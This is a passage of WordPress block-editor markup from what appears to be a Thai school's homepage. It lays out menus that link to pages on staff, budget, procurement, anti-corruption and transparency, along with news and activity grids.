kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1704\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1754\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1697\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" 